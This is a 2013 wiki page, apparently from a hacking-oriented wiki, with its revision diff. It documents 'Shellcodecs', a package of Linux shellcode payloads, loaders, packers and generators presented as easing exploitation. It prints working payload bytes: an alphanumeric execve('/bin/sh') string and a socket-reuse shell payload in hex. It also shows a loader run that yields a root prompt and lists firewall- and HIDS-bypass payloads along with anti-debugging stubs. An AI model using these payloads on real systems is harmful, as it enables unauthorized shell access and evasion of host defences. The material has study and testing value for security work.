Latest revision as of 00:20, 26 May 2013

Shellcodecs is a collection of shellcodes, loaders, sources, and generators provided with documentation designed to ease the exploitation and shellcode programming process.

Dependencies

In order to run these shellcodes, the following dependencies are required:

Linux
GCC
Generators require Python 2.7
Automake

Unless otherwise noted, code is amd64. There are various 32-bit examples as well. If you think you may have an out of date version, or that the official version is out-of-sync with the site, the latest sources will be available 100% of the time in the shellcode appendix.

Nicely output shellcode in a variety of formats (shellcode-generator.py)
Hash-generator for self-linking shellcode 81 bytes (hash-generator.s)
Socket-reuse shellcode generator (socket-reuse-generator.py)
Polymorphic socket reuse generator (poly-socket-reuse-generator.py)
Sends socket reuse shellcode (socket-reuse.c)
32-bit shellcode packer 37 bytes (packer-32.s) (Docs)
64-bit shellcode packer 55 bytes (packer-64.s) (Docs)
ELF64 symbol table parser 188 bytes (elf64-parser.s) (Docs)

Payloads

Short unlinked 64-bit null-free setuid(0); execve('/bin/sh',0,0); 32 bytes (setuid_binsh.s) (Docs)
Small unlinked 32-bit null-free write-to-file payload 90 bytes (write-file-32.s) (Docs)
Null-free unlinked same-socket-shell payload 115 bytes (socket-reuse.s) (Docs)
Alphanumeric amd64 execve('/bin/sh',0,0) 104 bytes (ascii_binsh.s) (Docs)
Null-free dynamic ELF64 exit code 135 bytes (linked-exit.s) (Docs)
Null-free dynamic ELF64 socket reuse shellcode 268 bytes (linker-fd-reuse.s) (Docs)
Null-free polymorphic dynamic ELF64 socket reuse shellcode 268 bytes (poly-linker-fd-reuse.s)

Stubs

A 32-bit getpc (%eax) example 11 bytes (getpc-32.s) (Docs)
A 64-bit getpc (%rax) example 12 bytes (getpc-64.s) (Docs)
Alternative 64-bit getpc 10 bytes (getpc-64-alt.s) (Docs)
Int3 detection code 24 bytes (int3-detect-64.s) (Docs)
32-bit lastcall example code 4 bytes (lastcall-32.s) (Docs)
64-bit lastcall example code 5 bytes (lastcall-64.s) (Docs)
64-bit alphanumeric lastcall example code 13 bytes (lastcall-alphanum.s) (Docs)
Alphanumeric x86* compatible getCPU 15 bytes (architecture_detection) (Docs)
32-bit shellcode unpacker 89 bytes (decoder-32.s) (Docs)
64-bit shellcode unpacker (mmap) 102 bytes (decoder-64.s) (Docs)
64-bit shellcode unpacker 69 bytes (decoder-64.s) (Docs)

Building the code

tar xzvf shellcode.tgz
cd shellcode
make

It is also possible to make exclusively x86 or x64 binaries using make x86 or make x64. Please keep in mind, there is more support for 64-bit in this package than 32-bit.

Using the tools

Generators

The shellcode generator assembles shellcode from its assembly file (or a binary) and outputs the byte code as raw ascii, a hexadecimal representation, or as a C variable. It can also optionally output the length of the shellcode. The raw ascii representation can be piped into a generator or exploit (or a binary file), whereas the hexadecimal representation can be used in exploit code.

Help

Terminal

localhost:~ $ generators/shellcode-generator.py --help
usage: shellcode-generator.py [-h] --file FILE [--hex] [--raw] [--var] [--len]
optional arguments:
-h, --help show this help message and exit
--file FILE
--hex Output in hex format (\x0f\x05)
--raw Output in raw format
--var Output as a variable
--len Output the length

An example of using the generator to output raw ascii follows:

Terminal

localhost:~ $ generators/shellcode-generator.py --file=ascii-shellcode/ascii_binsh --raw XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00

The socket reuse generator accepts the source IP and source port that the socket reuse shellcode will be sent from and outputs the hexadecimal representation of the code to input into the socket-reuse-send.c source file.

[user@localhost shellcode]$ generators/socket-reuse-generator.py 
Usage: generators/socket-reuse-generator.py <source IP> <source port>
[user@localhost shellcode]$ generators/socket-reuse-generator.py 127.0.0.1 1234
"\xeb\x05\x6a\x3c\x58\x0f\x05\x6a\x02\x5f\x48\x8d\x54\x24\xec\xc6"
"\x02\x10\x48\x8d\x72\x04\xff\xc7\x66\x85\xff\x74\xe5\x48\x8d\x62"
"\x14\x48\x83\xec\x20\x6a\x34\x58\x0f\x05\x84\xc0\x75\xe8\x6a\x1b"
"\x59\xbb\x80\xff\xff\xfe\xf7\xd3\x39\x1c\x8c\x75\xd9\xb1\x35\x66"
"\xbb\xfb\x2d\x66\xf7\xd3\x66\x39\x1c\x4c\x75\xca\x50\x5e\x6a\x21"
"\x58\x0f\x05\xff\xc6\x83\xfe\x04\x75\xf4\x5f\x57\x57\x5e\x5a\x48"
"\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f"
"\x6a\x3b\x58\x0f\x05"
[user@localhost shellcode]$ gcc -o socket-reuse/socket-reuse-send socket-reuse/socket-reuse-send.c 
[user@localhost shellcode]$

Loaders

The standard loader accepts shellcode as a command line argument (argv[1]) and executes it. This can be combined with the shellcode generator to test code:

Terminal

localhost:~ $ loaders/loader-64 $(generators/shellcode-generator.py --file=null-free/setuid_binsh.s --raw)
[root@localhost shellcode]# exit
exit

The socket loader runs any input off of the socket as it is received to test socket-based code (such as the socket-reuse code). It accepts a port number as an argument. Warning: this code listens on all ports, so only use it on a closed network.

{{LinuxCMD|loaders/socket-loader 1235

[*] Received 117 bytes, executing.

}

Getting help

We are not free technical support and reserve the right to revoke support to anyone for any reason at any time.

If you're using the tools and there's a problem, try re-reading the documentation before asking a question. If you're absolutely sure it is programmatical error and not user error preventing the code from working properly, you can let us know by talking on the shellcode talk page.

Credits

Lead developer: hatter
Supporting developers: jtRIPper, eax

Shellcodecs is part of a series on programming.
<center>

</center>

Difference between revisions of "Shellcodecs"

Latest revision as of 00:20, 26 May 2013

Contents

Dependencies

Contents

Building the code

Using the tools

Generators

Loaders

Getting help

Credits

Navigation menu

Views

Personal tools

Wiki

Community

Search

Tools

@@ Line 1: / Line 1: @@
-Shellcodecs is a collection of [[shellcode]]s, [[Shellcode/Loaders|loaders]], [[Shellcode/Appendix|sources]], and [[Shellcode/Appendix#Generators|generators]] designed to ease the [[exploitation]] and [[shellcode]] [[programming]] process.
+'''Shellcodecs''' is a collection of [[shellcode]]s, [[Shellcode/Loaders|loaders]], [[Shellcode/Appendix|sources]], and [[Shellcode/Appendix#Generators|generators]] provided with [[shellcode|documentation]] designed to ease the [[exploitation]] and [[shellcode]] [[programming]] process.
+== Dependencies ==
-Loaders:
+In order to run these [[Shellcode|shellcodes]], the following dependencies are required:
-* Unlinked 32-bit
-* Unlinked 64-bit
-* Dynamic C loader
-* Dynamic socket loader
-Payloads:
+* [[Linux]]
-* setuid(0); execve('/bin/sh',0,0)
+* GCC
-* Alphanumeric execve('/bin/sh',0,0) 104 bytes
+* Generators require [[Python]] 2.7
-* Same-socket-shell (Firewall bypass)
+* Automake
-* Dynamic linker (HIDS/HIPS bypass, syscall restriction bypass)
-Generators:
+Unless otherwise noted, code is amd64.  There are various 32-bit examples as well. If you think you may have an out of date version, or that the official version is out-of-sync with the site, the latest sources will be available 100% of the time in the [[Shellcode/Appendix|shellcode appendix]].
-* Shellcode extractor
-* Standard unlinked same-socket-shell generator
-* Dynamic socket-shell generator
---------------------------------
-        Sponsored by Viral Security
+== Contents ==
-             www.viralsec.com
+<center>
+<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
+'''Loaders'''
-=Intro=
+-----
+<div align="left">
+:* 32-bit executable mmap-based shellcode loader ''66 bytes'' ([[Shellcode/Appendix#loader-32.s|loader-32.s]]) ([[Shellcode/Loaders|Docs]])
+:* 64-bit executable mmap-based shellcode loader ''79 bytes'' ([[Shellcode/Appendix#loader-64.s|loader-64.s]]) ([[Shellcode/Loaders|Docs]])
+:* A dynamic loader for locally executable code in [[C]] ([[Shellcode/Appendix#dynamic-loader.c|dynamic-loader.c]])
+:* A dynamic loader for remotely executable code ([[Shellcode/Appendix#socket-loader.c|socket-loader.c]])
+</div></div>
-These shellcodes are provided with documentation located at [[Shellcode]]
-{{Warning|END USER IS LIABLE FOR THEIR OWN ACTIONS}}
-In order to run these [[Shellcode|shellcodes]], the following dependencies are required:
+<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
+'''Tools'''
-* [[Linux]]
+-----
-* [[GCC]]
+<div align="left">
-* Generators require [[Python]] 2.7
+:* Nicely output shellcode in a variety of formats ([[Shellcode/Appendix#shellcode-generator.py|shellcode-generator.py]])
-* Automake
+:* Hash-generator for self-linking shellcode ''81 bytes'' ([[Shellcode/Appendix#hash-generator.s|hash-generator.s]])
-Shellcodecs is a collection of [[shellcode]]s, [[Shellcode/Loaders|loaders]], [[Shellcode/Appendix|sources]], and [[Shellcode/Appendix#Generators|generators]] designed to ease the [[exploitation]] and [[shellcode]] [[programming]] process.
+:* Socket-reuse shellcode generator ([[Shellcode/Appendix#socket-reuse-generator.py|socket-reuse-generator.py]])
+:* Polymorphic socket reuse generator ([[Shellcode/Appendix#poly-socket-reuse-generator.py|poly-socket-reuse-generator.py]])
+:* Sends socket reuse shellcode ([[Shellcode/Appendix#socket-reuse.c|socket-reuse.c]])
+:* 32-bit shellcode packer ''37 bytes'' ([[Shellcode/Appendix#packer-32.s|packer-32.s]]) ([[Shellcode/Self-modifying#32_bit|Docs]])
+:* 64-bit shellcode packer ''55 bytes'' ([[Shellcode/Appendix#packer-64.s|packer-64.s]]) ([[Shellcode/Self-modifying#64_bit|Docs]])
+:* ELF64 symbol table parser ''188 bytes'' ([[Shellcode/Appendix#elf64-parser.s|elf64-parser.s]]) ([[Shellcode/Parsing|Docs]])
+</div></div>
-Unless otherwise noted, code is amd64.  There are various intel32 etc examples as well.  If you're unaware, amd64 is the main linux tree for 64-bit, so if you have an intel, you should still be ok. If you think you may have an out of date version, or that the official version is out-of-sync with the site, the latest sources will be available 100% of the time in the [[Shellcode/Appendix|shellcode appendix]].
-== Contents ==
+<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
+'''Payloads'''
-=== loaders ===
+-----
-        Description:   32-bit executable mmap-based shellcode loader
+<div align="left">
-        Filename:      loader-32.s
+:* Short unlinked 64-bit null-free setuid(0); execve('/bin/sh',0,0); ''32 bytes'' ([[Shellcode/Appendix#setuid_binsh.s|setuid_binsh.s]]) ([[Shellcode/Null-free#64-bit|Docs]])
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Loaders
+:* Small unlinked 32-bit null-free write-to-file payload ''90 bytes'' ([[Shellcode/Appendix#write-file-32.s|write-file-32.s]]) ([[Shellcode/Null-free#32-bit|Docs]])
-        Length:        66 bytes
+:* Null-free unlinked same-socket-shell payload ''115 bytes'' ([[Shellcode/Appendix#socket-reuse.s|socket-reuse.s]]) ([[Shellcode/Socket-reuse|Docs]])
+:* Alphanumeric amd64 execve('/bin/sh',0,0) ''104 bytes'' ([[Shellcode/Appendix#ascii_binsh.s|ascii_binsh.s]]) ([[Shellcode/Alphanumeric|Docs]])
+:* Null-free dynamic ELF64 exit code ''135 bytes'' ([[Shellcode/Appendix#linked-exit.s|linked-exit.s]]) ([[Shellcode/Dynamic|Docs]])
+:* Null-free dynamic ELF64 socket reuse shellcode ''268 bytes'' ([[Shellcode/Appendix#linker-fd-reuse.s|linker-fd-reuse.s]]) ([[Shellcode/Dynamic#The_dynamic_shell|Docs]])
+:* Null-free polymorphic dynamic ELF64 socket reuse shellcode ''268 bytes'' ([[Shellcode/Appendix#poly-linker-fd-reuse.s|poly-linker-fd-reuse.s]])
+</div></div>
-        Description:   64-bit executable mmap-based shellcode loader
-        Filename:      loader-64.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Loaders
-        Length:        79 bytes
-        Description:   A dynamic loader for locally executable code
-        Filename:      dynamic-loader.c
-        Description:   A dynamic loader for remotely executable code
+<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
-        Filename:      socket-loader.c
+'''Stubs'''
-=== environment ===
+-----
-        Description:   A 32-bit getpc (%eax) example
+<div align="left">
-        Filename:      getpc-32.s
+:* A 32-bit getpc (%eax) example ''11 bytes'' ([[Shellcode/Appendix#getpc-32.s|getpc-32.s]]) ([[Shellcode/Environment#x86_.2832_bit.29|Docs]])
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
+:* A 64-bit getpc (%rax) example ''12 bytes'' ([[Shellcode/Appendix#getpc-64.s|getpc-64.s]]) ([[Shellcode/Environment#x64|Docs]])
-        Length:        11 bytes
+:* Alternative 64-bit getpc ''10 bytes'' ([[Shellcode/Appendix#getpc-64-alt.s|getpc-64-alt.s]]) ([[Shellcode/Environment#x64|Docs]])
-        Description:   A 64-bit getpc (%rax) example
+:* Int3 detection code ''24 bytes'' ([[Shellcode/Appendix#int3-detect-64.s|int3-detect-64.s]]) ([[Shellcode/Environment#int3_breakpoints|Docs]])
-        Filename:      getpc-64.s
+:* 32-bit lastcall example code ''4 bytes'' ([[Shellcode/Appendix#lastcall-32.s|lastcall-32.s]]) ([[Shellcode/Environment#Null-free|Docs]])
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
+:* 64-bit lastcall example code ''5 bytes'' ([[Shellcode/Appendix#lastcall-64.s|lastcall-64.s]]) ([[Shellcode/Environment#Null-free_2|Docs]])
-        Length:        12 bytes
+:* 64-bit alphanumeric lastcall example code ''13 bytes'' ([[Shellcode/Appendix#lastcall-alphanum.s|lastcall-alphanum.s]]) ([[Shellcode/Environment#Alphanumeric_2|Docs]])
-        Description:   Alternative 64-bit getpc (%rax) example
+:* Alphanumeric x86* compatible getCPU ''15 bytes'' ([[Shellcode/Appendix#architecture_detection|architecture_detection]]) ([[Shellcode/Environment#Practically_Applied:_Code|Docs]])
-        Filename:      getpc-64-alt.s
+:* 32-bit shellcode unpacker ''89 bytes'' ([[Shellcode/Appendix#decoder-32.s|decoder-32.s]]) ([[Shellcode/Self-modifying#The_unpacker|Docs]])
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
+:* 64-bit shellcode unpacker (mmap) ''102 bytes'' ([[Shellcode/Appendix#decoder-64.s|decoder-64.s]]) ([[Shellcode/Self-modifying#The_unpacker|Docs]])
-        Length:        10 bytes
+:* 64-bit shellcode unpacker ''69 bytes'' ([[Shellcode/Appendix#decoder-64.s|decoder-64.s]]) ([[Shellcode/Self-modifying#The_unpacker|Docs]])
-        Description:   Breakpoint detection code
-        Filename:      int3-detect-64.s
+</div></div>
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#int3_breakpoints
+</center>
-        Length:        24 bytes
-        Description:   32-bit lastcall example code
-        Filename:      lastcall-32.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#32-bit
-        Length:        4 bytes
-        Description:   64-bit lastcall example
-        Filename:      lastcall-64.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#64-bit
-        Length:        5 bytes
-        Description:   Alphanumeric lastcall
-        Filename:      lastcall-alphanum.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#Alphanumeric_2
-        Length:        13 bytes
-=== null-free ===
-        Description:   A very short setuid(0); execve('/bin/sh',0,0);
-        Filename:      setuid_binsh.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Null-free
-        Length:        32 bytes
-        Description:   A small write-to-file payload
-        Filename:      write-file-32.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Null-free
-        Length:        90 bytes
-=== socket-reuse ===
-        Description:   same-socket-shell payload
-        Filename:      socket-reuse.s
-        Documentation: http://blackhatlibrary.net/Shellcode/Socket-reuse
-        Length:        115 bytes
-        Description:   sends socket reuse shellcode
-        Filename:      socket-reuse.c
-=== self-modifying ===
-        Description:   32-bit shellcode unpacker
-        Filename:      decoder-32.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
-        Length:        89 bytes
-        Description:   64-bit decoder (mmap)
-        Filename:      decoder.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
-        Length:        102 bytes
-        Description:   64-bit decoder
-        Filename:      decoder-no-mmap.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
-        Length:        69 bytes
-        Description:   32-bit shellcode packer
-        Filename:      packer-32.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#32_bit
-        Length:        37 bytes
-        Description:   64-bit shellcode packer
-        Filename:      packer-64.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#64_bit
-        Length:        55 bytes
-=== alphanumeric ===
-        Filename:      ascii_binsh.s
-        Description:   alphanumeric execve('/bin/sh',0,0)
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Alphanumeric
-        Length:        111 bytes
-        Filename:      architecture_detection
-        Description:   alphanumeric x86* compatible architecture detection stub
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment
-        Length:        15 bytes
-=== dynamic ===
-        Description:   Self-linking exit code
-        Filename:      linked-exit.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Dynamic
-        Length:        135 bytes
-        Description:   Self-linking socket reuse shellcode
-        Filename:      linker-fd-reuse.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Dynamic#The_dynamic_shell
-        Length:        268 bytes
-        Description:   Self-linking polymorphic socket reuse shellcode
-        Filename:      poly-linker-fd-reuse.s
-        Documentation: None
-        Length:        268 bytes
-=== generators ===
-        Description:   Hash generator for self-linking shellcode
-        Filename:      hash-generator.s
-        Documentation: None
-        Length:        81 bytes
-        Description:   Socket-reuse shellcode generator
-        Filename:      socket-reuse-generator.py
-        Documentation: None
-        Description:   Polymorphic socket reuse generator
-        Filename:      poly-socket-reuse-generator.py
-        Documentation: None
-        Description:   Nicely assemble and output shellcode in a variety of formats (raw, hex, and as a C variable)
-        Filename:      shellcode-generator.py
-        Documentation: None
 =Building the code=
-    * tar xzvf shellcode.tgz
+* tar xzvf shellcode.tgz
-    * cd shellcode
+* cd shellcode
-    * make
+* make
-    It is also possible to make exclusively x86 or x64
-    binaries using make x86 or make x64.  Please keep in
+It is also possible to make exclusively x86 or x64 binaries using make x86 or make x64.  Please keep in mind, there is more support for 64-bit in this package than 32-bit.
-    mind, there is more support for 64-bit in this
-    package than 32-bit.
 =Using the tools=
-    [loaders]
+==Generators==
-    [generators]
-=Package contents=
+The shellcode generator [[assembly|assembles]] [[shellcode]] from its assembly file (or a binary) and outputs the byte code as raw ascii, a [[hexadecimal]] representation, or as a [[C]] variable. It can also optionally output the length of the shellcode. The raw ascii representation can be piped into a generator or exploit (or a [[binary]] file), whereas the hexadecimal representation can be used in exploit code.
-     Unless otherwise noted, code is amd64.  There are various
-     intel32 etc examples as well.  If you're unaware, amd64 is
+* Help
-     the main linux tree for 64-bit, so if you have an intel,
-     you should still be ok.
+{{LinuxCMD|generators/shellcode-generator.py --help
-     If you think you may have an out of date version, or that
+usage: shellcode-generator.py [-h] --file FILE [--hex] [--raw] [--var] [--len]
-     the official version is out-of-sync with the site, the
-     latest sources will be available 100% of the time at:
+optional arguments:
-         http://blackhatlibrary.net/Shellcode/Appendix
-    Directory: loaders
+-h, --help   show this help message and exit
-        Description:   32-bit executable mmap-based shellcode loader
-        Filename:      loader-32.s
+--file FILE
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Loaders
-        Length:        66 bytes
+--hex        Output in hex format (\x0f\x05)
-        Description:   64-bit executable mmap-based shellcode loader
-        Filename:      loader-64.s
+--raw        Output in raw format
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Loaders
-        Length:        79 bytes
+--var        Output as a variable
-        Description:   A dynamic loader for locally executable code
-        Filename:      dynamic-loader.c
+--len        Output the length
-        Description:   A dynamic loader for remotely executable code
+}}
-        Filename:      socket-loader.c
-    Directory: environment
+<br />
-        Description:   A 32-bit getpc (%eax) example
-        Filename:      getpc-32.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
+* An example of using the generator to output raw ascii follows:
-        Length:        11 bytes
-        Description:   A 64-bit getpc (%rax) example
+{{LinuxCMD|generators/shellcode-generator.py --file&#x3d;ascii-shellcode/ascii_binsh --raw
-        Filename:      getpc-64.s
+XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00}}
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
-        Length:        12 bytes
-        Description:   Alternative 64-bit getpc (%rax) example
-        Filename:      getpc-64-alt.s
+The [[Shellcode/Socket-reuse|socket reuse]] generator accepts the source IP and source port that the socket reuse [[shellcode]] will be sent from and outputs the [[hexadecimal]] representation of the code to input into the [[Shellcode/Appendix#socket-reuse-send.c|socket-reuse-send.c]] source file.
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
-        Length:        10 bytes
+<pre>
-        Description:   Breakpoint detection code
+[user@localhost shellcode]$ generators/socket-reuse-generator.py
-        Filename:      int3-detect-64.s
+Usage: generators/socket-reuse-generator.py <source IP> <source port>
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#int3_breakpoints
+[user@localhost shellcode]$ generators/socket-reuse-generator.py 127.0.0.1 1234
-        Length:        24 bytes
+"\xeb\x05\x6a\x3c\x58\x0f\x05\x6a\x02\x5f\x48\x8d\x54\x24\xec\xc6"
-        Description:   32-bit lastcall example code
+"\x02\x10\x48\x8d\x72\x04\xff\xc7\x66\x85\xff\x74\xe5\x48\x8d\x62"
-        Filename:      lastcall-32.s
+"\x14\x48\x83\xec\x20\x6a\x34\x58\x0f\x05\x84\xc0\x75\xe8\x6a\x1b"
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#32-bit
+"\x59\xbb\x80\xff\xff\xfe\xf7\xd3\x39\x1c\x8c\x75\xd9\xb1\x35\x66"
-        Length:        4 bytes
+"\xbb\xfb\x2d\x66\xf7\xd3\x66\x39\x1c\x4c\x75\xca\x50\x5e\x6a\x21"
-        Description:   64-bit lastcall example
+"\x58\x0f\x05\xff\xc6\x83\xfe\x04\x75\xf4\x5f\x57\x57\x5e\x5a\x48"
-        Filename:      lastcall-64.s
+"\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f"
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#64-bit
+"\x6a\x3b\x58\x0f\x05"
-        Length:        5 bytes
+[user@localhost shellcode]$ gcc -o socket-reuse/socket-reuse-send socket-reuse/socket-reuse-send.c
-        Description:   Alphanumeric lastcall
+[user@localhost shellcode]$
-        Filename:      lastcall-alphanum.s
+</pre>
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#Alphanumeric_2
-        Length:        13 bytes
+==Loaders==
-    Directory: null-free
-        Description:   A very short setuid(0); execve('/bin/sh',0,0);
+The standard loader accepts shellcode as a command line argument (argv[1]) and executes it. This can be combined with the shellcode generator to test code:
-        Filename:      setuid_binsh.as
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Null-free
+{{LinuxCMD|loaders/loader-64 $(generators/shellcode-generator.py --file&#x3d;null-free/setuid_binsh.s --raw)
-        Length:        32 bytes
+[root@localhost shellcode]# exit
-        Description:   A small write-to-file payload
+exit}}
-        Filename:      write-file-32.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Null-free
-        Length:        90 bytes
+The socket loader runs any input off of the socket as it is received to test socket-based code (such as the socket-reuse code). It accepts a port number as an argument. Warning: this code listens on all ports, so only use it on a closed network.
-    Directory: socket-reuse
-        Description:   same-socket-shell payload
+{{LinuxCMD|loaders/socket-loader 1235
-        Filename:      socket-reuse.s
+ [*] Received 117 bytes, executing.
-        Documentation: http://blackhatlibrary.net/Shellcode/Socket-reuse
+}
-        Length:        115 bytes
-        Description:   sends socket reuse shellcode
-        Filename:      socket-reuse.c
-    Directory: self-modifying
-        Description:   32-bit shellcode unpacker
-        Filename:      decoder-32.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
-        Length:        89 bytes
-        Description:   64-bit decoder (mmap)
-        Filename:      decoder.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
-        Length:        102 bytes
-        Description:   64-bit decoder
-        Filename:      decoder-no-mmap.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
-        Length:        69 bytes
-        Description:   32-bit shellcode packer
-        Filename:      packer-32.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#32_bit
-        Length:        37 bytes
-        Description:   64-bit shellcode packer
-        Filename:      packer-64.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#64_bit
-        Length:        55 bytes
-    Directory: alphanumeric
-        Filename:      ascii_binsh.s
-        Description:   alphanumeric execve('/bin/sh',0,0)
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Alphanumeric
-        Length:        111 bytes
-        Filename:      architecture_detection
-        Description:   alphanumeric x86* compatible architecture detection stub
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment
-        Length:        15 bytes
-    Directory: dynamic
-        Description:   Self-linking exit code
-        Filename:      linked-exit.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Dynamic
-        Length:        135 bytes
-        Description:   Self-linking socket reuse shellcode
-        Filename:      linker-fd-reuse.s
-        Documentation: http://www.blackhatlibrary.net/Shellcode/Dynamic#The_dynamic_shell
-        Length:        268 bytes
-        Description:   Self-linking polymorphic socket reuse shellcode
-        Filename:      poly-linker-fd-reuse.s
-        Documentation: None
-        Length:        268 bytes
-    Directory: generators
-        Description:   Hash generator for self-linking shellcode
-        Filename:      hash-generator.s
-        Documentation: None
-        Length:        81 bytes
-        Description:   Socket-reuse shellcode generator
-        Filename:      socket-reuse-generator.py
-        Documentation: None
-        Description:   Polymorphic socket reuse generator
-        Filename:      poly-socket-reuse-generator.py
-        Documentation: None
-        Description:   Nicely assemble and output shellcode in a variety of formats (raw, hex, and as a C variable)
-        Filename:      shellcode-generator.py
-        Documentation: None
 =Getting help=
-        Note: We are not your free tech support.
+{{Warning|<center>We are not free technical support and reserve the right to revoke support to anyone for any reason at any time.</center>}}
-:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)~~
-           Reminder: Docs are available at
+If you're using the tools and there's a problem, try re-reading [[shellcode|the documentation]] before asking a question.  If you're absolutely sure it is programmatical error and not user error preventing the code from working properly, you can let us know by talking on the shellcode talk page.
-       http://www.blackhatlibrary.net/shellcode
-   If you're using the tools and there's a problem, try
-re-reading the documentation before asking a question.  If
-you're absolutely sure it is programmatical error and not
-user error preventing the code from working properly, you
-can let us know by joining our IRC or talking on the
-shellcode talk page.
-   If you'd like to pay for professional training on the
-materials contained in this courseware, please contact our
-sponsor at www.viralsec.com
 =Credits=
-  Lead developer:        Hatter
+* Lead developer:        [[User:Hatter|hatter]]
-  Supporting developers: jtRIPper, eax
+* Supporting developers: [[User:jtRIPper|jtRIPper]], [[User:Eax|eax]]
-  Community:   www.blackhatlibrary.net
-  Commercial:     www.viralsec.com
+{{programming}}{{social}}
+[[Category:Shellcode]]